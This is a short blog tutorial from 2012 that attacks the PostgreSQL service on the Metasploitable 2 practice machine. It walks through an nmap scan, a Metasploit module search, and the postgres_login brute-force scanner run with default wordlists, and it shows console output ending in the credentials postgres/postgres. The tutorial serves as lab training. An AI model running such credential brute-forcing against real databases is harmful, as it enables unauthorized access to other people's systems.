Archive

Posts Tagged ‘matasploit’

Attacking PostgreSQL On Metasplitable 2

Czerwiec 18, 2012 Dodaj komentarz

Attacking PostgreSQL On Metasplitable 2

In this article we will see how we can attack a system that contains a PostgreSQL database.

Lets say that we have perform a port scan on a server and we have identify that is running a PostgreSQL database at port 5432.

Scanning with nmap:

nmap -sV 192.168.235.129

nmap -sV 192.168.235.129

nmap -sV 192.168.235.129

We will open the metasploit framework and we will looking „postgresql”:

msf > search postgresql

Matching Modules
================

Name                                         Disclosure Date  Rank       Description
—-                                         —————  —-       ———–
auxiliary/admin/postgres/postgres_readfile                    normal     PostgreSQL Server Generic Query
auxiliary/admin/postgres/postgres_sql                         normal     PostgreSQL Server Generic Query
auxiliary/scanner/postgres/postgres_login                     normal     PostgreSQL Login Utility
auxiliary/scanner/postgres/postgres_version                   normal     PostgreSQL Version Probe
exploit/windows/postgres/postgres_payload    2009-04-10       excellent  PostgreSQL for Microsoft Windows Payload Execution

We will use the postgres_login scanner.

Usage Information:

msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(postgres_login) > run

Set the target address range:

msf>set RHOSTS 192.168.235.129

and

msf  auxiliary(postgres_login) > exploit

[*] 192.168.235.129:5432 Postgres – [01/21] – Trying username:’postgres’ with password:” on database ‚template1’
[-] 192.168.235.129:5432 Postgres – Invalid username or password: ‚postgres’:”
[-] 192.168.235.129:5432 Postgres – [01/21] – Username/Password failed.
[*] 192.168.235.129:5432 Postgres – [02/21] – Trying username:” with password:” on database ‚template1′
[-] 192.168.235.129:5432 Postgres – Invalid username or password: ”:”
[-] 192.168.235.129:5432 Postgres – [02/21] – Username/Password failed.
[*] 192.168.235.129:5432 Postgres – [03/21] – Trying username:’scott’ with password:” on database ‚template1’
[-] 192.168.235.129:5432 Postgres – Invalid username or password: ‚scott’:”
[-] 192.168.235.129:5432 Postgres – [03/21] – Username/Password failed.
[*] 192.168.235.129:5432 Postgres – [04/21] – Trying username:’admin’ with password:” on database ‚template1’

……………………………………………………………………………………………………………………………………….

This scanner is already configured to use the default wordlists about postgreSQL databases of metasploit framework so we will use them in this case:

 USERPASS_FILE     C:/Program Files/Rapid7/framework/msf3/data/wordlists/postgres_default_userpass.txt 

no File containing (space-seperated) users and passwords, one pair per line

USER_FILE         C:/Program Files/Rapid7/framework/msf3/data/wordlists/postgres_default_user.txt     

no File containing users, one per line

Waiting,waiting and:

success

Success

We have user name – „postgres” ,and password – „postgres

Now we can login as posgres user:

login

Source:

1.Metasploit Unleashed – http://www.offensive-security.com/metasploit-unleashed/Admin_Postgres_Modules

2.PostgreSQL Login Utility – http://www.metasploit.com/modules/auxiliary/scanner/postgres/postgres_login